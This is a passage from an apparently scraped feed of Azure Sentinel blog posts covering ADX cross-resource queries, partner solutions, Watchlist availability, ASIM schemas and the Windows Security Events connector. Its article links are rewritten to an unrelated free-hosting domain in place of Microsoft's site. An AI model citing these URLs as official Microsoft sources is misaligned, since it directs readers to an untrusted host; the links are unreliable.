SCXW253823728"><SPAN class="TrackedChange BCX8 SCXW253823728"><SPAN class="TextRun BCX8 SCXW253823728" data-contrast="none"><SPAN class="NormalTextRun BCX8 SCXW253823728" data-ccp-parastyle="Normal (Web)">: <A href="#" target="_self">Integrate Azure Data Explorer for long-term log retention</A></SPAN></SPAN></SPAN></SPAN></P> <P>&nbsp;</P> <P><STRONG>Creating cross-resource queries&nbsp;&nbsp;</STRONG></P> <P>To query data stored in ADX clusters, simply use the adx() function to specify the ADX cluster, database name, and desired table. You can then query the output as you would any other table.&nbsp; If you have access to an ADX cluster with active data, it is super easy to try.</P> <P>&nbsp;</P> <P>Here is a brief summary of the adx() function syntax to help get you started:</P> <PRE>adx(“&lt;<EM>Cluster URI&gt;</EM>/&lt;<EM>Database Name&gt;</EM>).&lt;<EM>Table Name&gt;</EM></PRE> <P>&nbsp;</P> <P>Here is an example query that accesses public data:</P> <PRE>adx("https://help.kusto.windows.net/Samples").StormEvents | take 5</PRE> <P>You can find the full details here: <A href="#" target="_blank" rel="noopener">Cross-query your Log Analytics or Application Insights resources and Azure Data Explorer</A></P> <P>&nbsp;</P> <P><STRONG>Using cross-resource queries on the hunting queries, livestream, and logs pages&nbsp;</STRONG></P> <P>Once you know how to construct cross-reference queries, using them in the hunting experience is easy. Go to the hunting queries page and click "+ New query" to create a new custom query.&nbsp; Add&nbsp;your cross-resource query to the "Custom Query" field as you would for any other hunting query.</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="ADX_Hunting_Query.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/295553i9584B21183044FA7/image-size/large?v=v2&amp;px=999" role="button" title="ADX_Hunting_Query.png" alt="ADX_Hunting_Query.png" /></span></P> <P>&nbsp;</P> <P>The&nbsp;process is similar for the livestream experience. On the hunting page livestream tab, click "+ New Livestream"&nbsp; to open the livestream query authoring experience:</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="ADX_Livestream.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/295554i070238BF4FAA27D9/image-size/large?v=v2&amp;px=999" role="button" title="ADX_Livestream.png" alt="ADX_Livestream.png" /></span></P> <P>&nbsp;</P> <P>You can also create cross-resource queries directly in the Azure Sentinel Logs (Log Analytics) experience. This is very convenient when iterating on and refining your queries during the hunting process, as well as diagnosing and resolving query errors.</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="BenNick_0-1625790289375.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/294522i7558DA2E982C40BC/image-size/large?v=v2&amp;px=999" role="button" title="BenNick_0-1625790289375.png" alt="BenNick_0-1625790289375.png" /></span></P> <P>&nbsp;</P> <P><STRONG>Additional Information</STRONG></P> <P>There are no performance guarantees for querying over ADX data from Azure Sentinel.&nbsp; Additionally, this preview only supports cross-resource queries for the previously mentioned features.&nbsp; Features such as Analytics do not support cross-resource queries.</P> <P>&nbsp;</P> <P><STRONG>Learn more:</STRONG></P> <P>Find out more about the following topics:</P> <UL> <LI>Cross-resource queries:&nbsp;<A href="#" target="_blank" rel="noopener">Cross-query your Log Analytics or Application Insights resources and Azure Data Explorer</A></LI> <LI>Using hunting queries:&nbsp;<A href="#" target="_blank" rel="noopener">Hunt for threats with Azure Sentinel</A></LI> <LI>Using livestream:&nbsp;<A href="#" target="_blank" rel="noopener">Use hunting livestream in Azure Sentinel to detect threats</A></LI> <LI><SPAN class="TrackChangeTextInsertion TrackedChange BCX8 SCXW253823728"><SPAN class="TextRun BCX8 SCXW253823728" data-contrast="none"><SPAN class="NormalTextRun BCX8 SCXW253823728" data-ccp-parastyle="Normal (Web)">Sending logs from Azure Sentinel to Azure Data Explorer</SPAN></SPAN></SPAN><SPAN class="TrackChangeTextInsertion TrackedChange BCX8 SCXW253823728"><SPAN class="TrackedChange BCX8 SCXW253823728"><SPAN class="TextRun BCX8 SCXW253823728" data-contrast="none"><SPAN class="NormalTextRun BCX8 SCXW253823728" data-ccp-parastyle="Normal (Web)">: <A href="#" target="_self">Integrate Azure Data Explorer for long-term log retention</A></SPAN></SPAN></SPAN></SPAN></LI> </UL> <P>&nbsp;</P> <P>&nbsp;</P> <P>&nbsp;</P> Wed, 14 Jul 2021 19:00:00 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/what-s-new-azure-sentinel-hunting-supports-adx-cross-resource/ba-p/2530678 Ben Nick 2021-07-14T19:00:00Z Azure Sentinel Solutions for Partners: Build Combined Value for a Wider Audience https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/azure-sentinel-solutions-for-partners-build-combined-value-for-a/ba-p/2547174 <P>At the RSA Conference in May, we were excited to announce the release of <A href="#" target="_blank" rel="noopener">Azure Sentinel solutions</A>, a new way for Azure Sentinel customers to discover and deploy use cases and integrations faster than ever.</P> <P>&nbsp;</P> <P>Solutions make it easy to enable new use-cases for Azure Sentinel by consolidating related data connectors, analytics rules, interactive workbooks, and automation playbooks into a single package to deliver end-to-end product or domain or industry vertical value for customers.</P> <P>&nbsp;</P> <P>With solutions, customers can more easily detect and respond to threats with out-of-the-box content for their critical use cases, all in one package. They can empower their SOC team with content developed by Microsoft’s security experts – and our trusted technology partners – with instant deployment. Our investment in solutions and our expanding partner network is key to helping customers stay secure and protect their organizations.</P> <P>&nbsp;</P> <P>A new blade in Azure Sentinel offers a growing marketplace of solutions designed to help customers protect their entire digital estate and integrate Azure Sentinel with their existing security infrastructure to operationalize their critical use cases. The marketplace now features more than 40 solutions, including:</P> <UL> <LI>Cloudflare and Palo Alto Prisma solutions to give you visibility into your cloud workloads. This week, we also released new solutions to help you monitor multi-cloud environments, with solutions for GCP Identity and Access Management, GCP CloudDNS, and GCP CloudMonitor.</LI> <LI>Threat intelligence solutions from RiskIQ, and ReversingLabs to enrich your threat detection, hunting and response capabilities.</LI> <LI>Azure SQL and Oracle database audit solutions to monitor your database anomalies.</LI> <LI>…And many others, with even more to come. Just this week, we released an additional ten solutions into Public Preview. In addition to the new multi-cloud solutions mentioned above, we’re releasing solutions for Sophos Endpoint Protection, Cisco Application Centric Interface, Web Security Appliance, Secure email Gateway, TrendMicro ApexOne, McAffee Network Security Platform and anti-virus information, InsightVM Cloud API (Rapid7) and Juniper Intrusion Detection and Prevention.</LI> </UL> <P>Solutions makes it easier and faster for customers to use Azure Sentinel. They also represent a significant opportunity for our technology partners.</P> <P>&nbsp;</P> <H2>Azure Sentinel solutions and partners</H2> <P>&nbsp;</P> <P>Solutions make it easier than ever for joint customers to discover, deploy, and maximize the value of the integrations that our technology partners create. With solutions, partners can:</P> <P>&nbsp;</P> <P><STRONG>Unlock more value for your current customers and create new use cases.</STRONG> When you build an Azure Sentinel solution, you’re giving your customers everything they need to start maximizing the security value that your product or service already gives them – by building detections on top of that data, enabling them to cross-correlate it with the rest of their ecosystem, streamline investigation via the investigation graph, automate responses, and more. By delivering solutions you have an opportunity to deeply integrate with each of these Azure Sentinel SIEM and SOAR capabilities to not only deliver combined value for your current offerings but also expand to newer use cases that Azure Sentinel has to offer currently and in the future.</P> <P>&nbsp;</P> <P><STRONG>Reach new customers.</STRONG> &nbsp;Broaden discoverability and reach a new customer base through the Azure Sentinel solutions marketplace. Azure Sentinel solutions integrate with <A href="#" target="_blank" rel="noopener">Azure Marketplace</A>, and the solutions you deliver is showcased both in Azure Sentinel solutions blade as well as the Azure Marketplace. Hence delivering solutions gives you a direct connection to a potentially new and broad customer base.</P> <P>&nbsp;</P> <P><STRONG>Productize your investments.</STRONG> Enable customers to deploy integrations with just a few clicks by combining content into one single, easily discoverable, easily deployable package - consolidating value across data connectors, analytics, playbooks, and more. With solutions, you are delivering a combined productized value for your offerings in Azure Sentinel to deliver end-to-end scenarios in Azure Sentinel for our mutual customers.</P> <P>&nbsp;</P> <P>Here are some examples of use cases partners can deliver as Azure Sentinel solutions:</P> <UL> <LI><STRONG>Product value</STRONG> – Direct product or service integrations to deliver your product value in Azure Sentinel. Some examples include Azure SQL, Cisco Umbrella, Crowdstrike, Checkpoint solutions.</LI> <LI><STRONG>Domain value</STRONG> – Content to deliver domain value in areas like threat intelligence, insider threat, compliance, and more. Some examples include HYAS, ReversingLabs, or RiskIQ solutions. &nbsp;</LI> <LI><STRONG>Industry vertical value</STRONG> – Deliver industry vertical value in areas like ERP, healthcare, finance, retail, etc. Some examples include SAP or Microsoft Dynamics solutions.</LI> <LI>Refer to the <A href="#" target="_blank" rel="noopener">Azure Sentinel solutions catalog</A> to discover more. Define your own unique use cases to deliver customer value!</LI> </UL> <P>As we continue to build more value into solutions and work with technology partners to expand our library of solutions, the potential possibilities with solutions will only continue to grow. &nbsp;</P> <P>&nbsp;</P> <H2>Building your Azure Sentinel solution</H2> <P>&nbsp;</P> <P>So, how can technology partners get started with building their own Azure Sentinel solution? There are three key steps to this process: building content, packaging content, and listing the offering. Refer to the <A href="#" target="_blank" rel="noopener">Azure Sentinel solutions build guide</A> for further details on this 3-step process.</P> <P>&nbsp;</P> <P><STRONG>Build content</STRONG></P> <P>First, you need to start by building the content you want to include in your solution – including data connectors, workbooks, playbooks, analytics, hunting rules, and more. You can learn more about how to create content in the <A href="#" target="_blank" rel="noopener">Azure Sentinel GitHub getting started documentation</A>. &nbsp;</P> <P>&nbsp;</P> <P>After content is submitted, it will be validated and reviewed by the Azure Sentinel team. After any feedback is addressed, you can move on to packaging your content.</P> <P>&nbsp;</P> <P><STRONG>Package content</STRONG></P> <P>After content is approved, the next step is to package content into the solution. We provide a <A href="#" target="_blank" rel="noopener">packaging tool</A> for this process. <A href="#" target="_blank" rel="noopener">Follow the guidance</A> to create your solution package and validate. &nbsp;&nbsp;</P> <P>&nbsp;</P> <P><STRONG>Publish the solution </STRONG></P> <P>The Azure Sentinel solution publishing process is powered by the <A href="#" target="_blank" rel="noopener">Microsoft Partner Center.</A> After a one-time registration in the Partner Center, you can create your offering, configure its details, and publish. During this phase, the Azure Sentinel team will also step in to help you get this solution listed in the Azure Sentinel solutions gallery within the Azure Sentinel interface. Refer to Step-3 in the <A href="#" target="_blank" rel="noopener">Azure Sentinel solutions build guide</A> for step-by-step guidance.</P> <P>&nbsp;</P> <H2>Getting started – and announcing the Azure Sentinel 2021 Hackathon</H2> <P>&nbsp;</P> <P>We’re very excited about the new possibilities that the launch of Azure Sentinel solutions opens and the wider audience that it gives our technology partners. This is only the beginning, and we’re looking forward to continuing to expand the capabilities of solutions and tap into the possibilities that they offer.</P> <P>&nbsp;</P> <P>If you’re interested in building an Azure Sentinel solution, now is the perfect time to get started building content! We recently kicked off the second annual Azure Sentinel Hackathon. This hackathon challenges security experts around the globe to build end-to-end cybersecurity solutions for Azure Sentinel that delivers enterprise value by collecting data, managing security, detecting, hunting, investigating, and responding to constantly evolving threats – plus, you can win a piece of the $19,000 cash prize pool. Learn more about the hackathon <A href="https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/join-in-the-azure-sentinel-hackathon-2021/ba-p/2466335" target="_blank" rel="noopener">here</A>. &nbsp;</P> <P>&nbsp;</P> <P>To learn more about solutions, visit the following resources:</P> <UL> <LI>Learn more about Azure Sentinel solutions in <A href="https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/introducing-azure-sentinel-solutions/ba-p/2347312" target="_blank" rel="noopener">the announcement blog from RSA Conference</A>.</LI> <LI>Read the <A href="#" target="_blank" rel="noopener">Azure Sentinel solution documentation</A> for more details.</LI> <LI>Learn how to build solutions in the <A href="#" target="_blank" rel="noopener">Azure Sentinel solution build guide</A>.</LI> <LI>Visit the <A href="#" target="_blank" rel="noopener">Azure Sentinel solutions catalog</A> to see the solutions that are available today.</LI> </UL> <P>We’d love to hear from you as you embark on the solutions creation journey! Let us know your feedback using any of the channels listed in the&nbsp;<A href="#" target="_blank" rel="noopener">Resources</A>.</P> Wed, 14 Jul 2021 14:44:13 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/azure-sentinel-solutions-for-partners-build-combined-value-for-a/ba-p/2547174 Preeti_Krishna 2021-07-14T14:44:13Z Watchlist is now Generally Available https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/watchlist-is-now-generally-available/ba-p/2533859 <P><STRONG>Today we are announcing the General Availability (GA) of Azure Sentinel Watchlist to all regions!</STRONG></P> <P>&nbsp;</P> <P>Azure Sentinel watchlists enable the collection of data from external data sources for correlation with the events in your Azure Sentinel environment. Watchlists are stored in your Azure Sentinel workspace as name-value pairs and are cached for optimal query performance and low latency.&nbsp;</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="WL-GA-Blog-Post.gif" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/295069iA8BBA3436DCD8CD0/image-size/large?v=v2&amp;px=999" role="button" title="WL-GA-Blog-Post.gif" alt="WL-GA-Blog-Post.gif" /></span></P> <P>&nbsp;</P> <P><STRONG>Get started today with these watchlist use cases:</STRONG></P> <UL> <LI><STRONG>Import data from csv for analytic rules &amp; hunting</STRONG>. Utilize the watchlist name/value pairs for joining and filtering for use in analytic rules, threat hunting, workbooks, notebooks and for general queries.&nbsp;For a full list of the functionalities and the step-by-step instructions, refer to the <A href="#" target="_blank" rel="noopener">official documentation</A>.</LI> <LI><STRONG>Update your watchlist using the new user interface</STRONG>. Add new or update existing watchlist items via an Excel-like grid. Add/remove columns from the UI for better usability. See <A href="https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/what-s-new-azure-sentinel-update-watchlist-ui-enhancements/ba-p/2451476" target="_self">article</A> for more information.&nbsp;</LI> <LI><STRONG>Automate watchlist operations with playbooks</STRONG>. Leverage in Logic App playbooks as part of your security automation story for incidents, alerts, etc. Click <A href="https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/playbooks-amp-watchlists-part-1-inform-the-subscription-owner/ba-p/1768917" target="_self">here</A> for a two part tutorial and also check out the playbooks in the GitHub repo <A href="#" target="_self">link</A> (look for all of the playbooks with "watchlist" in the name).</LI> <LI><STRONG>Automatically update IPs used by the major cloud providers.&nbsp;</STRONG>Using a watchlist function (<A href="#" target="_self">link</A>), c<SPAN>reate a watchlist for each cloud provider (Azure, AWS, GCP) and automatically update their respective IP ranges to enable allow-list or block-lists detections or for queries and reports.</SPAN></LI> <LI><STRONG>Deploy via ARM for bulk deployments</STRONG>. Use ARM templates for quick deployment scenarios as well as bulk deployments. Learn more <A href="https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/what-s-new-azure-sentinel-watchlist-support-for-arm-templates/ba-p/2424429" target="_self">here</A> to get started with links and examples.&nbsp;</LI> <LI><STRONG>Import watchlist with curated IOCs</STRONG>. Use watchlist ARM templates for curating and sharing non-Sentinel data across workspaces. Check out the Watchlist section in our GitHub repo for examples like <A href="#" target="_self">this</A>&nbsp;one for Nobelium cyber attack.</LI> </UL> <P>Enjoy!</P> <P>Azure Sentinel Watchlist Team</P> Mon, 12 Jul 2021 18:13:09 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/watchlist-is-now-generally-available/ba-p/2533859 JulianGonzalez 2021-07-12T18:13:09Z What's new: ASIM Authentication, Process, Registry and enhanced Network schemas https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/what-s-new-asim-authentication-process-registry-and-enhanced/ba-p/2502268 <TABLE style="border-style: none; width: 100%;" width="100%"> <TBODY> <TR> <TD width="100%"> <P>Hello everyone,</P> <P>&nbsp;</P> <P>Continuing our&nbsp;<A href="#" target="_blank" rel="noopener">normalization journey</A>, we added to the networking and <A href="https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/what-s-new-azure-sentinel-information-model-dns-schema-and/ba-p/2429926" target="_blank" rel="noopener">DNS</A> schemas the&nbsp;<A href="#" target="_blank" rel="noopener">Authentication</A>, <A href="#" target="_blank" rel="noopener">Process Events</A>, and <A href="#" target="_blank" rel="noopener">Registry Events&nbsp;</A>schemas and delivered normalized content based on the two. We also added ARM template deployment and support for Microsoft Defender for Endpoints to the&nbsp;<A href="#" target="_blank" rel="noopener">Network Schema</A>.</P> <P>&nbsp;</P> <P data-unlink="true">Special thanks to&nbsp;@Yuval Naor&nbsp;,&nbsp;@Yaron Fruchtmann&nbsp;, and&nbsp;@Batami Gold&nbsp;, who made all this possible.</P> <P>&nbsp;</P> <H2>Why should you care?</H2> <P>&nbsp;</P> <UL> <LI><STRONG>Cross source detection:</STRONG> Normalized Authentication analytic rules work across sources, on-prem and cloud, now detecting attacks such as brute force or impossible travel across systems including Okta, AWS, and Azure.</LI> <LI><STRONG>Source agnostic rules</STRONG>: process event analytics support any source that a customer may use to bring in the data, including Defender for Endpoint, Windows Events, and Sysmon. We are ready to add&nbsp;<A href="#" target="_blank" rel="noopener">Sysmon for Linux</A>&nbsp;and WEF once released!</LI> <LI><STRONG>EDR</STRONG> support: Process, Registry, Network, and Authentication consist the core of EDR event telemetry.</LI> <LI><STRONG>Ease of use</STRONG>: The&nbsp;<A href="#" target="_blank" rel="noopener">Network Schema</A>&nbsp;introduced last year is now easier to use with a single-click ARM template deployment.</LI> </UL> <P>&nbsp;</P> <P>Deploy the&nbsp;<A href="#" target="_blank" rel="noopener">Authentication</A>,&nbsp;<A href="#" target="_blank" rel="noopener">Process Events</A>, <A href="#" target="_blank" rel="noopener">Registry Events</A>, or&nbsp;<A href="#" target="_blank" rel="noopener">Network Session</A>&nbsp;parser packs in a single click using ARM templates.&nbsp;</P> <P>&nbsp;</P> <P>Join us to learn more about the Azure Sentinel information model in&nbsp;<A href="#" target="_blank" rel="noopener">two webinars</A>:</P> <UL> <LI><STRONG>The Information Model: Understanding Normalization in Azure Sentinel</STRONG></LI> <LI><STRONG style="font-family: inherit; background-color: transparent;"><STRONG>Deep Dive into Azure Sentinel Normalizing Parsers and Normalized Content</STRONG></STRONG></LI> </UL> <H2><STRONG>Why normalization, and what is the Azure Sentinel Information Model?</STRONG></H2> <P>&nbsp;</P> <P>Working with various data types and tables together presents a challenge. You must become familiar with many different data types and schemas, write and use a unique set of analytics rules, workbooks, and hunting queries for each, even for those that share commonalities (for example, DNS servers). Correlation between the different data types necessary for investigation and hunting is also tricky.</P> <P>&nbsp;</P> <P>The Azure Sentinel Information Model (ASIM) provides a seamless experience for handling various sources in uniform, normalized views. ASIM aligns with the&nbsp;<A href="#" target="_blank" rel="noopener">Open-Source Security Events Metadata (OSSEM)</A>&nbsp;common information model, promoting vendor agnostic, industry-wide normalization. ASIM:</P> <UL> <LI>Allows source agnostic content and solutions</LI> <LI>Simplifies analyst use of the data in sentinel workspaces</LI> </UL> <P>&nbsp;</P> <TABLE style="border-style: hidden;"> <TBODY> <TR> <TD width="335"> <P>The current implementation is based on query time normalization using KQL functions. And includes the following:</P> <UL> <LI><STRONG>Normalized schemas</STRONG>&nbsp;cover standard sets of predictable event types that are easy to work with and build unified capabilities. The schema defines which fields should represent an event, a normalized column naming convention, and a standard format for the field values.</LI> <LI><STRONG>Parsers</STRONG>&nbsp;map existing data to the normalized schemas. Parsers are implemented using <A href="#" target="_blank" rel="noopener">KQL functions</A>.</LI> <LI><STRONG>Content for each normalized schema</STRONG>&nbsp;includes analytics rules, workbooks, hunting queries, and additional content. This content works on any normalized data without the need to create source-specific content.</LI> </UL> <P>&nbsp;</P> </TD> <TD width="670"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Ofer_Shezaf_0-1625063752942.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/292571iBEA7BF3B5E708551/image-size/large?v=v2&amp;px=999" role="button" title="Ofer_Shezaf_0-1625063752942.png" alt="Ofer_Shezaf_0-1625063752942.png" /></span> <P>&nbsp;</P> </TD> </TR> </TBODY> </TABLE> </TD> </TR> <TR> <TD width="100%"> <P>Ofer Shezaf</P> <P>Principal Product Manager, Azure Sentinel</P> </TD> </TR> </TBODY> </TABLE> Fri, 02 Jul 2021 14:38:05 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/what-s-new-asim-authentication-process-registry-and-enhanced/ba-p/2502268 Ofer_Shezaf 2021-07-02T14:38:05Z Testing the New Version of the Windows Security Events Connector with Azure Sentinel To-Go! https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/testing-the-new-version-of-the-windows-security-events-connector/ba-p/2483369 <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Cyb3rWard0g_7-1624588039379.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/291175iC2FCABD1976A6547/image-size/large?v=v2&amp;px=999" role="button" title="Cyb3rWard0g_7-1624588039379.png" alt="Cyb3rWard0g_7-1624588039379.png" /></span></P> <P>&nbsp;</P> <P>&nbsp;</P> <P><SPAN data-contrast="auto">Last week, on&nbsp;Monday June 14</SPAN><SPAN data-contrast="auto">th</SPAN><SPAN data-contrast="auto">,&nbsp;2021,&nbsp;a&nbsp;new version of the&nbsp;</SPAN><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Windows Security Events data connector</SPAN></A><SPAN data-contrast="auto">&nbsp;reached public preview. This is the&nbsp;first&nbsp;data&nbsp;connector&nbsp;created leveraging&nbsp;the new generally&nbsp;available&nbsp;</SPAN><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Azure Monitor Agent (AMA)</SPAN></A><SPAN data-contrast="auto">&nbsp;and&nbsp;</SPAN><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Data Collection Rules (DCR)</SPAN></A><SPAN data-contrast="auto">&nbsp;features from the Azure Monitor&nbsp;ecosystem.&nbsp;As&nbsp;any other new feature in Azure Sentinel, I wanted to&nbsp;expedite the testing process and empower others in the InfoSec community&nbsp;through a lab environment to learn more about it.</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P>&nbsp;</P> <P><SPAN data-contrast="auto">In this post, I&nbsp;will&nbsp;talk about&nbsp;the new features&nbsp;of the&nbsp;new data connector and&nbsp;how to automate the deployment of an Azure Sentinel instance&nbsp;with&nbsp;the connector&nbsp;enabled, the creation and association of&nbsp;DCRs and&nbsp;installation of the AMA on a&nbsp;Windows workstation.&nbsp;This is an extension of&nbsp;</SPAN><A href="https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/azure-sentinel-to-go-part2-integrating-a-basic-windows-lab-via/ba-p/1742165" target="_blank" rel="noopener"><SPAN data-contrast="none">a&nbsp;blog post</SPAN></A><SPAN data-contrast="auto">&nbsp;I wrote,&nbsp;last year (2020),&nbsp;where I covered the collection of Windows security events via the&nbsp;</SPAN><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Log Analytics Agent (Legacy)</SPAN></A><SPAN data-contrast="auto">.</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <H2><SPAN data-contrast="none">Recommended Reading<BR /></SPAN></H2> <P>&nbsp;</P> <P><SPAN data-contrast="auto">I highly recommend reading the following blog posts to&nbsp;learn more about&nbsp;the announcement of the new Azure Monitor features and the Windows Security Events data connector:</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <UL> <LI data-leveltext="" data-font="Symbol" data-listid="43" aria-setsize="-1" data-aria-posinset="1" data-aria-level="1"><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Azure Monitor Agent and Data Collection Rules now generally available | Azure updates | Microsoft Azure</SPAN></A><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="43" aria-setsize="-1" data-aria-posinset="2" data-aria-level="1"><A href="https://gorovian.000webhostapp.com/?exam=t5/azure-monitor/a-powerful-agent-for-azure-monitor-and-a-simpler-world-of-data/ba-p/2443285" target="_blank" rel="noopener"><SPAN data-contrast="none">A powerful agent for Azure Monitor and a simpler world of data collection; now generally available! - Microsoft Tech Community</SPAN></A><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="43" aria-setsize="-1" data-aria-posinset="3" data-aria-level="1"><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Connect Windows security event data to Azure Sentinel (tabbed version) | Microsoft Docs</SPAN><SPAN>&nbsp;</SPAN></A><BR /><BR /></LI> </UL> <H2 aria-level="1"><SPAN data-contrast="none">Azure Sentinel To-Go!?</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559738&quot;:240,&quot;335559739&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></H2> <P>&nbsp;</P> <P><SPAN data-contrast="auto"><A href="#" target="_self">Azure Sentinel2Go</A> is an open-source project&nbsp;maintained and developed by the&nbsp;</SPAN><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Open Threat Research community</SPAN></A><SPAN data-contrast="auto">&nbsp;to&nbsp;automate&nbsp;the deployment of an Azure Sentinel&nbsp;research&nbsp;lab and a data ingestion pipeline to consume pre-recorded datasets.&nbsp;Every&nbsp;environment I release through this initiative is an environment I use and test while performing research as part of my role in the MSTIC R&amp;D team. Therefore, I am constantly&nbsp;trying to improve&nbsp;the deployment templates&nbsp;as I cover more scenarios.&nbsp;Feedback is greatly appreciated.</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P>&nbsp;</P> <H2><SPAN data-contrast="none">A New Version of the&nbsp;Windows Security Events Connector?</SPAN><SPAN>&nbsp;<BR /></SPAN></H2> <P>&nbsp;</P> <P><SPAN data-contrast="auto">According to&nbsp;</SPAN><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Microsoft docs</SPAN></A><SPAN data-contrast="auto">,&nbsp;the Windows Security Events connector lets you stream security events from any Windows server (physical or virtual, on-premises or in any cloud) connected to your Azure Sentinel workspace.&nbsp;After last week, there are now two versions of this connector:&nbsp;</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <UL> <LI data-leveltext="" data-font="Symbol" data-listid="42" aria-setsize="-1" data-aria-posinset="1" data-aria-level="1"><STRONG><SPAN data-contrast="auto">Security events</SPAN></STRONG><SPAN data-contrast="auto">&nbsp;(legacy version): Based on the&nbsp;</SPAN><STRONG><SPAN data-contrast="auto">Log Analytics Agent</SPAN></STRONG><SPAN data-contrast="auto">&nbsp;(Usually known as the Microsoft Monitoring&nbsp;Agent (MMA)&nbsp;or Operations Management Suite (OMS)&nbsp;agent).</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="42" aria-setsize="-1" data-aria-posinset="2" data-aria-level="1"><STRONG><SPAN data-contrast="auto">Windows Security Events</SPAN></STRONG><SPAN data-contrast="auto">&nbsp;(new version): Based on the new&nbsp;</SPAN><STRONG><SPAN data-contrast="auto">Azure Monitor Agent (AMA)</SPAN></STRONG><SPAN data-contrast="auto">.</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> </UL> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P><SPAN data-contrast="auto">In your Azure Sentinel data connector's view, you can now see both connectors:</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Cyb3rWard0g_0-1624563350650.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/291049iBC204BCF054B965A/image-size/large?v=v2&amp;px=999" role="button" title="Cyb3rWard0g_0-1624563350650.png" alt="Cyb3rWard0g_0-1624563350650.png" /></span></P> <P>&nbsp;</P> <H2><SPAN data-contrast="none">A New Version?&nbsp;What is New?</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></H2> <H3>&nbsp;</H3> <H3><SPAN data-contrast="none">Data Connector&nbsp;Deployment</SPAN><SPAN data-contrast="auto">&nbsp;</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></H3> <P>&nbsp;</P> <P><SPAN data-contrast="auto">Besides using the Log Analytics Agent&nbsp;to collect and&nbsp;ship events, the&nbsp;</SPAN><STRONG><SPAN data-contrast="auto">old&nbsp;connector</SPAN></STRONG><SPAN data-contrast="auto">&nbsp;uses the&nbsp;</SPAN><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Data Sources</SPAN></A><SPAN data-contrast="auto">&nbsp;resource&nbsp;from the&nbsp;</SPAN><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Log Analytics Workspace</SPAN></A><SPAN 